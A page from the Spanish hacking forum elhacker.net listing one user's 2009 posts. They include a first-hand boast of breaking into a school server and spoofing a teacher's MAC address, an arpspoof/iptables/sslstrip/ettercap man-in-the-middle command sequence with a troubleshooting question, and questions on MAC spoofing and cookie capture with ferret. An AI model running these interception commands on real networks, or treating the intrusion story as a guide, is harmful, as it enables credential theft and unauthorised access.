elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Rompecabezas de Bitcoin, Medio millón USD en premios


  Mostrar Mensajes
Páginas: 1 [2]
11  Seguridad Informática / Hacking / Problemas con cambio de Mac Linux en: 26 Noviembre 2009, 10:55 am
Hola compañeros, he usado el buscador pero no he encontrado lo que buscaba.
Mi problema es el siguiente, estoy en un linux y quiero cambiarme la mac, hago lo siguiente:

ifconfig wlan0 down
ifconfig wlan0 hw ether XX:XX:XX:XX:XX:XX
ifconfig wlan0 up

me cambia la mac todo perfecto, pero no me puedo conectar a ninguna wifi con la nueva mac, y ninguna de ellas tiene filtro mac, he probado a poner los 6 primeros digitos que son los del fabricante originales y solo cambiar los 6 ultimos, pero tampoco, no entiendo que puede ser...
Gracias de antemano.
12  Seguridad Informática / Hacking / Re: Diario de un alumno en clase de informatica en: 25 Noviembre 2009, 12:38 pm
hombre... es un insti que cada curso son 4000€... como para que no se lo curren, en la 4a planta que es la de los ciclos, hay 40pcs por aula, 5 aulas, mas la sala de profes, el server que alli suben archivos y tal (NO EXAMENES NO SON TAN ESTUPIDOS), este server tiene todos los servicios, ftp, dns etc, tienen alli la web, el gic que es como un moodle, y demas cosas, amen de juegos que los subimos nosotros jaja.
Lo de cerrar los puertos, es porque son Switches HP con acceso ip e interficie grafica, es como conectarte por web a tu router pero envez de router un switch, y alli te salen todos los puertos, con el trafico, los que estan conectados y tal, pero claro tienes que saber cual tocar, y en eso me ayudo mi profe de redes jeje, amen que despues lo dejamos todo igual.
Jaja y ahora que me acuerdo, el profe que llevaba el mantenimiento (un enxufado porque de informatico poco, es economista), un dia se quedo todo pillado, porque vio nosecuantos intentos de acceso al server claro yo ahi probando combinaciones para el root, pero no paso nada porque no sabe ni mirar la mac que lo intento (estamos en dhcp).
13  Seguridad Informática / Hacking / Re: Diario de un alumno en clase de informatica en: 24 Noviembre 2009, 22:47 pm
Jajaj divertido es un rato, yo estoy estudiando administracion de sistemas informaticos, y saque la clave de admin de uno de los pc's, y el administrador era tan tonto que puso esa clave para todo, entonces, me conecte al server como admin, oh sorpresa archivos que no deberia ver... (no eran examenes no os emocioneis), pero habia unos pdf's con todas las mac's de los alumnos, las macs de los profes, y las ip's de los switches, se lo enseñe a mi profe de redes, y nos conectamos a el switch de aquella planta, y como el controla mucho mas que yo, me dijo, cierra este puerto, muy bien, acabas de dejar sin internet a las 2 primeras aulas, ahora cierra este, muy bien acabas de dejar sin internet a toda la planta, ahora ese, pues ahora has dejado sin internet a los profes.
Despues me puse la mac de un profe y me conecte a la wifi de la sala de profes (no hice ninguna cafrada, estoy pagando una pasta por este curso como para que me expulsen), por ultimo me conecte con putty al server y admin y la contraseña y padentro, pero no pude probar cosillas ni quitar el capador de web's que tienen porque necessitaba la contraseña root y ya no me mate para conseguirla.
En el mismo pdf de los switches tenian el de los puntos de acceso, y ale, agregar mac's de los compañeros, iphones, algun profe tambien etc, sabiendo la ip y el user y pass regalado.
Y despues lo tipico, control remoto entre pcs de clase, bucles, cain&abel, y abrirle la calculadora y cosas asi en medio de la explicacion con el proyector jaja.
Un saludo.
14  Seguridad Informática / Hacking / Problemas Sslstrip en: 1 Noviembre 2009, 21:11 pm
Hola compañeros, estoy haciendo mis pinitos con el sslstrip, hago los siguientes pasos:

Shell 1:
cd '/home/anonimous/Escritorio/sslstrip-0.4'
python setup.py build
python setup.py install

Shell 2:
arpspoof -i wlan0 -t 192.168.1.33 192.168.1.1

Shell 3:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 1000
sslstrip -l 1000

Shell 4:
sudo ettercap -Tqz -i wlan0

La primera vez que lo probe me funciono, pero despues me devuelve este error, y no entiendo su significado.

Traceback (most recent call last):
  File "/usr/local/bin/sslstrip", line 256, in <module>
    main(sys.argv[1:])
  File "/usr/local/bin/sslstrip", line 246, in main
    server = ThreadingHTTPServer(('', int(listenPort)), StripProxy)
  File "/usr/lib/python2.6/SocketServer.py", line 400, in __init__
    self.server_bind()
  File "/usr/lib/python2.6/BaseHTTPServer.py", line 108, in server_bind
    SocketServer.TCPServer.server_bind(self)
  File "/usr/lib/python2.6/SocketServer.py", line 411, in server_bind
    self.socket.bind(self.server_address)
  File "<string>", line 1, in bind
socket.error: [Errno 98] Address already in use


Haber si alguien me puede ayudar.
Gracias de antemano.

15  Seguridad Informática / Wireless en Windows / Re: Manual: Capturando Cookies En Red Conmutada Wifi Desde Windows [Hamster/Ferret] en: 21 Enero 2009, 20:49 pm
Hola siy nuevo, primero felicitaros por el foro. Estoy haciendo mis pinitos en esto de la seguridad.
He ejecutado el comando ferret -w y no me encuentra mi tarjeta wifi, pero el pc si la detecta, es mas estoy conectado con ella.
Alguna idea?
Páginas: 1 [2]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines